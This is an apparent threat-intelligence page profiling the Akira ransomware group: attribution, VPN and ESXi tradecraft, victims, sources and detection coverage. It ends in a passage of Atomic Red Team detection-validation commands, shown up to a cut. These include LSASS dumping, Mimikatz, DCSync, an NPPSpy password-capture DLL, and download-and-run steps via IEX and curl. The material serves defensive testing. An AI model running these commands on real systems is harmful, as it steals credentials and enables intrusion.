G1024 · threatengine.sh

Threat Actor

Akira

akira_ransomware · russia_speaking_cybercrime · active since 2023

Akira (Storm-1567 / Punk Spider / G1024) is one of the highest- volume ransomware operations of the 2023-2024 period - a financially-motivated organized cyber-criminal cluster operating predominantly from Russia, Ukraine, and adjacent post-Soviet states emerging in March 2023 - operating a Conti-codebase-leak- derived ransomware per Sophos technical analysis demonstrating substantial code similarity between Akira and the May 2022 ContiLeaks-leaked Conti source code, treated by modern vendor consensus as Conti-derived but operationally independent within the broader Russia-speaking organized cybercrime ecosystem.

with the most operationally significant FBI public attribution among newer ransomware operations: FBI + CISA + Europol + NCSC-NL joint cybersecurity advisory AA24-109A (April 18, 2024) documented Akira responsibility for compromise of 250+ organizations and approximately $42M USD in ransom collection by April 2024, with updated June 2024 FBI estimates documenting approximately $250M USD in cumulative ransom collection across the cluster's operational lifespan (positioning Akira among the highest-revenue ransomware operations alongside LockBit, Black Basta, and ALPHV / BlackCat)

distinguished operationally by two signature tradecraft patterns: (1) Cisco ASA / AnyConnect SSL VPN credential targeting against MFA-less VPN accounts using credentials harvested from underground marketplaces and infostealer deployments (Cisco Talos August 2023 detailed analysis, subsequently expanded to SonicWall and Fortinet VPN credential targeting) - operationally significant defender threat-modeling guidance for MFA-on-all- VPN-endpoints as primary control, and (2) VMware ESXi hypervisor targeting via Linux + ESXi ransomware variants enabling encryption of all virtual machines hosted on a single compromised ESXi hypervisor host (disproportionately high operational impact relative to deployment effort)

distinctive retro-aesthetic green-text 1980s-era computer terminal styling on the cluster's leak site representing operationally novel branding.

March 2024 Megazord Rust-language ransomware variant emergence consistent with broader contemporary cybercrime-cluster Rust-pivot patterns following ALPHV / BlackCat introduction.

high-profile documented victims including Nissan (Australia/New Zealand Dec 2023), Yamaha (Nov 2023), Stanford University, Tietoevry (Finland IT services Jan 2024 affecting Swedish public-sector customers), Lush Cosmetics, Hitachi Energy, City of Wichita Kansas.

russia_speaking_cybercrime confidence: high 16 aliases MITRE ATT&CK G1024 ↗

Hunt package↗ Sigma rules202 YARA rules46 Live IOCs19 CVEs exploited6

⬢

Profile

Akira (also tracked as Storm-1567 [Microsoft, earlier identifier], Punk Spider, and MITRE ATT&CK G1024) is one of the highest-volume ransomware operations of the 2023-2024 period

a financially- motivated organized cyber-criminal cluster operating predominantly from Russia, Ukraine, and adjacent post-Soviet states emerging in March 2023. The cluster operates a Conti-codebase-leak-derived ransomware per Sophos technical analysis demonstrating substantial code similarity between Akira ransomware and the May 2022 ContiLeaks-leaked Conti source code, supporting the analytical framing that Akira represents a Conti-derived operation operating Conti-codebase-derived tooling. Modern vendor consensus treats Akira as a Conti-derived but operationally independent cluster within the broader Russia-speaking organized cybercrime ecosystem. The cluster has the most operationally significant FBI public attribution among newer ransomware operations grounded in two coordinated international advisory events: First, FBI + CISA + Europol + Netherlands National Cyber Security Centre joint cybersecurity advisory AA24-109A (April 18, 2024) documenting Akira responsibility for compromise of 250+ organizations and approximately $42 million USD in ransom collection by April 2024. The four-government joint attribution represented one of the most operationally consequential international counter-ransomware coordinated formal-attribution events of 2024. Second, FBI updated Akira tracking estimates in June 2024 documented approximately $250 million USD in cumulative ransom collection across the cluster's operational lifespan.
positioning Akira among the highest-revenue ransomware operations of the 2023-2024 period alongside LockBit, Black Basta, and ALPHV / BlackCat. The substantial revenue growth between April 2024 ($42M USD) and June 2024 ($250M USD) estimates reflects either improved FBI visibility into Akira ransom collection or actual continued operational tempo growth.
likely combination of both. The cluster operates two operationally distinctive tradecraft signatures that distinguish Akira from peer ransomware operations: First, Cisco ASA / AnyConnect VPN credential targeting. Akira operates extensive targeting of Cisco ASA (Adaptive Security Appliance) and Cisco AnyConnect SSL VPN credential authentication infrastructure.
specifically MFA-less VPN accounts at target organizations. The tradecraft exploits the recurring defender pattern of Cisco ASA / AnyConnect deployments without multi- factor authentication on VPN accounts (despite Cisco's recommendation for MFA), with credential-stuffing attacks against VPN authentication endpoints using credentials harvested from underground marketplaces and infostealer-malware deployments. Cisco Talos published detailed August 2023 analysis documenting the tradecraft. Subsequent SonicWall and Fortinet VPN credential targeting expanded the tradecraft beyond Cisco infrastructure. The MFA-less-VPN-account targeting tradecraft represents operationally significant defender threat-modeling guidance.
organizations should enforce MFA on all VPN authentication endpoints. Second, VMware ESXi hypervisor targeting. Akira operates Linux + ESXi ransomware variants alongside the Windows ransomware variant. The tradecraft exploits the operational pattern where virtualization-dependent enterprise environments host substantial business-critical workloads on small numbers of ESXi hypervisor hosts.
compromise of an ESXi hypervisor host enables encryption of all virtual machines hosted on that hypervisor in a single ransomware deployment operation. ESXi-targeting ransomware represents disproportionately high operational impact relative to deployment effort. The tradecraft is consistent with broader contemporary cybercrime-cluster patterns (LockBit, Black Basta, ALPHV / BlackCat, Royal / BlackSuit all operate ESXi ransomware variants). A distinctive cluster operational signature is the retro- aesthetic green-text leak site with 1980s-era computer terminal styling.
operationally novel branding distinct from peer ransomware leak sites. The retro aesthetic gave Sophos' earliest detailed cluster disclosure (May 9, 2023) its memorable title "Akira Ransomware is Bringin' 1988 Back." The branding choice reflects the cluster's apparent recognition of public-facing operational positioning as a marketing dimension. In March 2024 Akira operators released Megazord.
a substantially-rewritten Rust-language ransomware variant consistent with broader contemporary cybercrime-cluster patterns following the ALPHV / BlackCat Rust-language ransomware introduction. Megazord operates alongside the original Akira ransomware variant. High-profile documented Akira victims include Nissan (Australia and New Zealand subsidiaries, December 2023), Yamaha (multiple subsidiaries November 2023), Stanford University (department- level compromise 2023), Tietoevry (Finland IT services provider, January 2024 affecting Swedish public-sector customers), Lush Cosmetics (January 2024), Hitachi Energy (March 2024), the City of Wichita Kansas (May 2024), and hundreds of additional manufacturing, healthcare, education, and government-sector targets. A handful of operational notes: First, the cluster represents one of the most operationally consequential newer ransomware operations of the 2023-2024 period. The $250M USD cumulative ransom collection estimate positions Akira among the highest-revenue ransomware operations alongside the major LockBit / Black Basta / ALPHV / BlackCat / Cl0p / Royal / BlackSuit references. Second, the cluster's analytical profile differs from peer contemporary cybercrime clusters in several ways: operational origin (Conti-codebase-derived emerging March 2023 vs LockBit's September 2019 emergence, Black Basta's April 2022 emergence as Conti successor, ALPHV / BlackCat's November 2021 emergence as DarkSide.
BlackMatter.
ALPHV lineage successor, Cl0p's February 2019 emergence from TA505 lineage), tradecraft emphasis (MFA-less-VPN-credential-targeting + ESXi-targeting), and operational branding (distinctive retro-aesthetic leak site). The cluster represents the central reference for understanding Conti-codebase-leak-derived ransomware operations that emerged following the May 2022 Conti source code leak. Third, no formal individual-operator attribution at the named- Russian-national tier has been publicly issued for Akira administrators.
consistent with the broader pattern of absence of similar named-individual-attribution for Cl0p, ALPHV / BlackCat, Black Basta, and several other contemporary cybercrime clusters. Only LockBit (Khoroshev), Evil Corp (Yakubets / Turashev), and FIN7 (Dunaev / Hladyr / Kolpakov / Witte) have received named-Russian-national-tier formal attribution among the major contemporary cybercrime clusters covered in this corpus. Fourth, the cluster's MFA-less-VPN-credential-targeting tradecraft provides operationally significant defender guidance. The sustained Akira success against MFA-less VPN accounts at target organizations demonstrates the operational vulnerability of VPN authentication infrastructure without multi-factor authentication.
an exposure category that traditional defender patch-management workflows do not address (the underlying VPN software is not vulnerable; the deployment without MFA is the vulnerability). Defender threat-modeling for ransomware operations should treat MFA-on-all-VPN-endpoints as a primary control requirement.

☉

Aliases

akiraakira ransomwareakira_ransomwareakiraransomwareakira gangakira_gangakiragangakira operatorsakira_operatorspunk spiderpunk_spiderpunkspiderstorm-1567g1024atk 263atk263

☉

MITRE ATT&CK aliases

Additional names MITRE lists for G1024.

GOLD SAHARAHowling Scorpius

⌖

Notable Campaigns

2024-2025Continued Operations (2024-2025)
2024Megazord Rust-Language Variant Emergence (March 2024)
2024FBI + CISA + Europol + NCSC-NL AA24-109A Akira Cybersecurity Advisory (April 18, 2024)
2024FBI Updated $250M USD Cumulative Ransom Collection Estimate (June 2024)
2023-2024Cisco ASA / AnyConnect VPN Credential Targeting (2023-2024)
2023-2024VMware ESXi Hypervisor Targeting Tradecraft (2023-2024)
2023-2024High-Profile Victims (2023-2024)
2023Akira Emergence (March 2023)

★

Attribution & Reporting

Attributed by

FBI Cyber DivisionCISA (US Cybersecurity and Infrastructure Security Agency)Europol European Cybercrime Centre (EC3)Netherlands National Cyber Security Centre (NCSC-NL)Mandiant / Google Cloud Threat IntelligenceMicrosoft Threat Intelligence CenterCrowdStrikeSophosRecorded Future Insikt GroupSentinelOneTrend MicroKaspersky GReATGroup-IBPRODAFTCovewareHalcyonCybereasonTrustwave SpiderLabsTrellixPWC Threat IntelligenceDFIR ReportCisco TalosArctic WolfGuidePoint Security

Key reporting

reportFBI + CISA + Europol + NCSC-NL: AA24-109A Akira Ransomware Cybersecurity Advisory (April 18, 2024) - most operationally significant international government formal public attribution

reportFBI: FBI and International Partners Issue Update on Akira Ransomware (June 2024) - $250M USD cumulative ransom collection estimate

reportSophos: Akira Ransomware is Bringin' 1988 Back (May 9, 2023) - earliest detailed seminal cluster analysis including Conti-codebase-derivation identification

reportCisco Talos: Akira Ransomware Targeting VPNs Without Multi-Factor Authentication (August 2023) - signature Cisco-VPN-targeting tradecraft disclosure

reportMandiant: Akira Ransomware Onset Tracking

reportCrowdStrike: Akira Ransomware Rises on Conti Leak Coattails (May 2023)

reportMicrosoft Threat Intelligence: Akira Rising - The Ransomware Stealing Millions (June 2024)

reportRecorded Future Insikt Group: Akira Ransomware Emerging Threat Tracking

reportSentinelOne Labs: Akira Ransomware Targets the Business Network

reportTrend Micro: Akira Ransomware Detected Spreading via Cisco AnyConnect Vulnerability (September 2023)

reportArctic Wolf: Akira Ransomware Incident Response Tracking

reportCoveware: Akira Ransomware Tracking (multiple years)

reportHalcyon: Akira Operational Profile

reportGuidePoint Security: Akira Incident Response Tracking

reportPRODAFT: Akira Detailed Operational Analysis

reportGroup-IB: Akira Continued Tracking

reportSophos: Akira Continued Tracking

reportMalpedia Actor Profile: Akira

reportMITRE ATT&CK Group G1024 - Akira

Sources & links

attack.mitre.org ↗ cisa.gov ↗ fbi.gov ↗ news.sophos.com ↗ blog.talosintelligence.com ↗ mandiant.com ↗ crowdstrike.com ↗ microsoft.com ↗ recordedfuture.com ↗ sentinelone.com ↗ trendmicro.com ↗ malpedia.caad.fkie.fraunhofer.de ↗

⬡

Operational

State sponsor

Akira is a financially-motivated organized cyber-criminal cluster

not a state-aligned cluster.
operating predominantly from Russia, Ukraine, and adjacent post-Soviet states. The cluster emerged in March 2023 as one of the highest-volume ransomware operations of the 2023-2024 period. The cluster operates a Conti-codebase-leak-derived ransomware (per Sophos technical analysis demonstrating substantial code similarity between Akira ransomware and the May 2022 ContiLeaks-leaked Conti source code) and maintains apparent personnel-overlap with the broader Wizard Spider / Conti ecosystem and Russia-speaking organized cybercrime ecosystem more broadly. Whether Akira represents a direct Conti successor brand, a related-but-separate cluster operating Conti-derived tooling, or a Conti-affiliate-spinoff cluster has been analytically open across vendor reporting.
modern vendor consensus tends toward treating Akira as a Conti- derived but operationally independent cluster within the broader Russia-speaking organized cybercrime ecosystem. The cluster has received the most operationally significant FBI public attribution among newer ransomware operations: the FBI + CISA + Europol + Netherlands National Cyber Security Centre joint cybersecurity advisory AA24-109A (April 18, 2024, updated June 2024) documented Akira responsibility for compromise of 250+ organizations and approximately $42 million USD in ransom collection by April 2024, with updated June 2024 FBI estimates documenting approximately $250 million USD in cumulative ransom collection across the cluster's operational lifespan. No formal individual- operator attribution at the named-Russian-national tier has been publicly issued for Akira administrators.

Motivations

financial_gain, financially_motivated, cybercrime, ransomware_deployment, extortion, double_extortion, ransomware_as_a_service_operations, vmware_esxi_targeting, vpn_credential_theft

Sectors

Regions

united_states canada united_kingdom germany france italy spain netherlands belgium sweden norway denmark finland australia new_zealand japan india brazil mexico global_predominantly_western

◇

Techniques Used

Build a hunt packdeployable Splunk/Elastic/Sentinel detections for these techniques

◈

Public detection by layer

60 techniques

Across this actor’s 60 mapped techniques, the share for which public detection content exists in each layer (published detection content across Sigma, Elastic, MITRE CAR, Snort/Suricata, YARA, and Nuclei). Low bars mean little ready-made detection is published for this adversary, so you would likely have to write your own. This is a view of available public content, not of the rules you have deployed.

Behavioral / log (Sigma)57/60 · 95%

Analytics (MITRE CAR)29/60 · 48%

Runtime / container (Falco)8/60 · 13%

File / malware (YARA)1/60 · 1%

Network (Suricata/Snort)16/60 · 26%

Vuln scan (Nuclei)0/60 · 0%

SIEM (Splunk ESCU)56/60 · 93%

SIEM (Elastic)57/60 · 95%

SIEM (Azure Sentinel)16/60 · 26%

✓

Public detection by technique

59/60

Public detection content exists for 59 of this actor’s 60 mapped techniques (98%); 1 have no published detection content. The ones with no published rule are listed first - you would need to source or write detection for those. This reflects published rules, not your own deployment. Per-account coverage, where you upload your own rules and we compute your real gaps, is on the roadmap.

          no public rule
          T1070.001
          Clear Windows Event Logs
          
          
        

          has rules
          T1059.001
          PowerShell
          Sigma 219
          rules 26
        

          has rules
          T1190
          Exploit Public-Facing Application
          Sigma 146
          rules 63
        

          has rules
          T1112
          Modify Registry
          Sigma 95
          rules 66
        

          has rules
          T1059
          Command and Scripting Interpreter
          Sigma 95
          rules 20
        

          has rules
          T1078
          Valid Accounts
          Sigma 61
          rules 51
        

          has rules
          T1105
          Ingress Tool Transfer
          Sigma 87
          rules 21
        

          has rules
          T1027
          Obfuscated Files or Information
          Sigma 94
          rules 4
        

          has rules
          T1003.001
          LSASS Memory
          Sigma 79
          rules 10
        

          has rules
          T1078.004
          Cloud Accounts
          Sigma 41
          rules 30
        

          has rules
          T1098
          Account Manipulation
          Sigma 34
          rules 35
        

          has rules
          T1053.005
          Scheduled Task
          Sigma 51
          rules 17
        

          has rules
          T1059.003
          Windows Command Shell
          Sigma 45
          rules 7
        

          has rules
          T1036
          Masquerading
          Sigma 40
          rules 8
        

          has rules
          T1071.001
          Web Protocols
          Sigma 41
          rules 6
        

          has rules
          T1033
          System Owner/User Discovery
          Sigma 30
          rules 14
        

          has rules
          T1082
          System Information Discovery
          Sigma 33
          rules 10
        

          has rules
          T1087.002
          Domain Account
          Sigma 21
          rules 19
        

          has rules
          T1203
          Exploitation for Client Execution
          Sigma 33
          rules 6
        

          has rules
          T1003
          OS Credential Dumping
          Sigma 36
          rules 2
        

          has rules
          T1204
          User Execution
          Sigma 10
          rules 27
        

          has rules
          T1018
          Remote System Discovery
          Sigma 17
          rules 18
        

          has rules
          T1059.005
          Visual Basic
          Sigma 28
          rules 4
        

          has rules
          T1083
          File and Directory Discovery
          Sigma 24
          rules 5
        

          has rules
          T1059.007
          JavaScript
          Sigma 23
          rules 4
        

          has rules
          T1070
          Indicator Removal
          Sigma 20
          rules 6
        

          has rules
          T1090
          Proxy
          Sigma 22
          rules 3
        

          has rules
          T1036.005
          Match Legitimate Resource Name or Location
          Sigma 21
          rules 1
        

          has rules
          T1070.004
          File Deletion
          Sigma 15
          rules 7
        

          has rules
          T1133
          External Remote Services
          Sigma 20
          rules 2
        

          has rules
          T1140
          Deobfuscate/Decode Files or Information
          Sigma 18
          rules 2
        

          has rules
          T1005
          Data from Local System
          Sigma 14
          rules 5
        

          has rules
          T1087
          Account Discovery
          Sigma 16
          rules 3
        

          has rules
          T1053
          Scheduled Task/Job
          Sigma 12
          rules 6
        

          has rules
          T1087.001
          Local Account
          Sigma 13
          rules 5
        

          has rules
          T1016
          System Network Configuration Discovery
          Sigma 12
          rules 5
        

          has rules
          T1071
          Application Layer Protocol
          Sigma 7
          rules 9
        

          has rules
          T1041
          Exfiltration Over C2 Channel
          Sigma 5
          rules 6
        

          has rules
          T1078.002
          Domain Accounts
          Sigma 7
          rules 4
        

          has rules
          T1135
          Network Share Discovery
          Sigma 7
          rules 4
        

          has rules
          T1003.005
          Cached Domain Credentials
          Sigma 8
          rules 1
        

          has rules
          T1003.006
          DCSync
          Sigma 7
          rules 2
        

          has rules
          T1057
          Process Discovery
          Sigma 7
          rules 2
        

          has rules
          T1119
          Automated Collection
          Sigma 5
          rules 4
        

          has rules
          T1189
          Drive-by Compromise
          Sigma 3
          rules 5
        

          has rules
          T1078.001
          Default Accounts
          Sigma 4
          rules 3
        

          has rules
          T1078.003
          Local Accounts
          Sigma 5
          rules 1
        

          has rules
          T1027.005
          Indicator Removal from Tools
          Sigma 4
          rules 1
        

          has rules
          T1036.004
          Masquerade Task or Service
          Sigma 3
          rules 1
        

          has rules
          T1074.001
          Local Data Staging
          Sigma 4
          
        

          has rules
          T1095
          Non-Application Layer Protocol
          Sigma 3
          rules 1
        

          has rules
          T1132.001
          Standard Encoding
          Sigma 4
          
        

          has rules
          T1204.001
          Malicious Link
          Sigma 4
          
        

          has rules
          T1074
          Data Staged
          Sigma 2
          rules 1
        

          has rules
          T1199
          Trusted Relationship
          Sigma 2
          rules 1
        

          has rules
          T1039
          Data from Network Shared Drive
          Sigma 2
          
        

          has rules
          T1090.002
          External Proxy
          Sigma 2
          
        

          has rules
          T1027.002
          Software Packing
          Sigma 1
          
        

          has rules
          T1027.013
          Encrypted/Encoded File
          
          rules 1
        

          has rules
          T1132
          Data Encoding
          
          rules 1
        

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.001 LSASS Memory · 14 tests

command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump

"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}

powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking

"#{dumpert_exe}"

command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

manualwindowsDump LSASS.exe Memory using Windows Task Manager

command_promptelevatedwindowsOffline Credential Theft With Mimikatz

"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

command_promptelevatedwindowsLSASS read with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump

command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump

"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}

powershellelevatedwindowsPowershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41

powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe

if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."

command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

T1003.005 Cached Domain Credentials · 1 test

command_promptwindowsCached Credential Dump via Cmdkey

cmdkey /list

T1003.006 DCSync · 2 tests

command_promptwindowsDCSync (Active Directory)

#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"

powershellwindowsRun DSInternals Get-ADReplAccount

Get-ADReplAccount -All -Server #{logonserver}

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

